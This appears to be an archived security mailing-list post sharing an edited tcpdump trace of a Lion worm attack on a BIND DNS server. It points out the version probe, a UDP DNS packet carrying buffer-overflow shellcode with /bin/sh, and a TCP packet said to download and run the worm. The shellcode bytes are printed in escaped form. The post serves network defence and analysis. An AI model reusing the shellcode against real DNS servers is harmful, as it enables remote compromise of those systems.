Lion TCPdump Trace

[Joshua Krage <jkrage () BUSER NET>]

I'm pasting in an edited "tcpdump -nv" output file of a captured Lion
attack sequence.  I'm also enclosing the 3.5k TCPdump source file I used
for the dump.  Interestingly, using "-vv" flag with TCPdump on OpenBSD
2.8-current will dump core.

I've munged the MAC and IP addresses to protect the capture source
(FDDI ring, MTU 4500).  Packet Checksums are all munged due to my edits.
The output below is missing the snap header and the bad checksum warnings
you will see if you run TCPdump on the source file.

Note the particular sequence of the UDP and TCP DNS requests, including
the deliberately stalled (open) TCP connection.  The UDP request sends
/bin/sh, but the TCP packet has the attack payload.
  - The UDP packet at 18:21:16.894258 contains the /bin/sh and shell code
    calls.
  - The TCP packet at 18:21:17.903803 contains the attack payload to
    download and execute the worm.


18:21:15.080161 13.14.10.13.4299 > 11.14.14.15.53: S 839911123:839911123(0) win 32120 <mss 1460,sackOK,timestamp 
19686696 0,nop,wscale 0> (DF) (ttl 52, id 24722)
18:21:15.085717 11.14.14.15.53 > 13.14.10.13.4299: S 3687140704:3687140704(0) ack 839911124 win 32120 <mss 
1460,sackOK,timestamp 33522220 19686696,nop,wscale 0> (DF) (ttl 61, id 5153)
18:21:15.189710 13.14.10.13.4299 > 11.14.14.15.53: . ack 1 win 32120 <nop,nop,timestamp 19686709 33522220> (DF) (ttl 
52, id 24728)
18:21:15.412368 13.14.10.13.4299 > 11.14.14.15.53: F 1:1(0) ack 1 win 32120 <nop,nop,timestamp 19686731 33522220> (DF) 
(ttl 52, id 24742)
18:21:15.418616 11.14.14.15.53 > 13.14.10.13.4299: . ack 2 win 32120 <nop,nop,timestamp 33522253 19686731> (DF) (ttl 
61, id 5154)
18:21:15.418747 11.14.14.15.53 > 13.14.10.13.4299: F 1:1(0) ack 2 win 32120 <nop,nop,timestamp 33522253 19686731> (DF) 
(ttl 61, id 5155)
18:21:15.543594 13.14.10.13.4299 > 11.14.14.15.53: . ack 2 win 32120 <nop,nop,timestamp 19686745 33522253> (DF) (ttl 
52, id 24743)
18:21:16.523703 13.14.10.13.4330 > 11.14.14.15.53: S 857826494:857826494(0) win 32120 <mss 1460,sackOK,timestamp 
19686843 0,nop,wscale 0> (DF) (ttl 52, id 24878)
18:21:16.526752 11.14.14.15.53 > 13.14.10.13.4330: S 3679763989:3679763989(0) ack 857826495 win 32120 <mss 
1460,sackOK,timestamp 33522364 19686843,nop,wscale 0> (DF) (ttl 61, id 5156)
18:21:16.647421 13.14.10.13.4330 > 11.14.14.15.53: . ack 1 win 32120 <nop,nop,timestamp 19686854 33522364> (DF) (ttl 
52, id 24879)
18:21:16.746834 13.14.10.13.1026 > 11.14.14.15.53:  43981 inv_q+ [b2&3=0x980] A? . (23) (ttl 52, id 24880)
18:21:16.758812 11.14.14.15.53 > 13.14.10.13.1026:  43981 inv_q FormErr [0q] 1/0/0    
^Band^@^@^P^@^C^GVERSION^DBIND^@^@^P^@^C^@^@. (Class 1541) Type0 (632) (ttl 61, id 5157)
18:21:16.894258 13.14.10.13.1026 > 11.14.14.15.53:  43981+ [2q] [1au] A? 
M-^PM-^PM-^PM-k;1M-[_M-^CM-o|M-^Mw^PM-^Iw^DM-^MO 
M-^IO^HM-3^PM-^I^Y1M-IM-1M-^?M-^I^OQ1M-@M-0fM-3^GM-^IM-yM-MM-^@Y1M-[9M-Xu^JfM-;^PM-jf9^^Bt^HM-bM-`.M-hM-@M-^?M-^?M-^?M-^IM-K1M-IM-1^C1M-@M-0?IM-MM-^@AM-bM-vM-k^T1M-@[M-^MK^TM-^I^YM-^IC^XM-^HC^G1M-RM-0^KM-MM-^@M-hM-gM-^?M-^?M-^?/bin/shM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P.M-^I.^L.N.M-k.M-@.^@.^@.?.^B.C.f.M-^@.^.C.M-0.M-M.M-^I.^L.V.M-0.C.M-^@.M-5.@.M-P.^H.M-{.M-?.M-{.M-?.L.^H.^@.^@.M-P.^H.M-`.@.M-^L.^H.^@.^@.^@.^@.^@.^@.M-{.M-?.M-^F.^H.^@.^@.M-P.^H.M-`.@.M-^L.^H.M-{.M-?.M-^D.^H.M-`.@.
 (509) (ttl 52, id 24882)
18:21:16.903590 11.14.14.15.53 > 13.14.10.13.1026:  43981 FormErr [0q] 0/0/0 (12) (ttl 61, id 5158)
18:21:17.903803 13.14.10.13.4330 > 11.14.14.15.53: P 1:501(500) ack 1 win 32120 <nop,nop,timestamp 19686980 33522364> 
(DF) (ttl 52, id 25000)
18:21:17.903815 13.14.10.13.4330 > 11.14.14.15.53: F 501:501(0) ack 1 win 32120 <nop,nop,timestamp 19686980 33522364> 
(DF) (ttl 52, id 25001)
18:21:17.911091 11.14.14.15.53 > 13.14.10.13.4330: . ack 501 win 31856 <nop,nop,timestamp 33522502 19686980> (DF) (ttl 
61, id 5159)
18:21:17.911102 11.14.14.15.53 > 13.14.10.13.4330: . ack 502 win 31856 <nop,nop,timestamp 33522502 19686980> (DF) (ttl 
61, id 5160)
18:21:17.969870 11.14.14.15.53 > 13.14.10.13.4330: P 1:15(14) ack 502 win 31856 <nop,nop,timestamp 33522508 19686980> 
(DF) (ttl 61, id 5161)
18:21:17.969878 11.14.14.15.53 > 13.14.10.13.4330: F 15:15(0) ack 502 win 31856 <nop,nop,timestamp 33522508 19686980> 
(DF) (ttl 61, id 5162)
18:21:18.083924 13.14.10.13.4330 > 11.14.14.15.53: R 857826996:857826996(0) win 0 (ttl 243, id 25018)
18:21:18.088165 13.14.10.13.4330 > 11.14.14.15.53: R 857826996:857826996(0) win 0 (ttl 243, id 25019)

Attachment: lion.td
Description: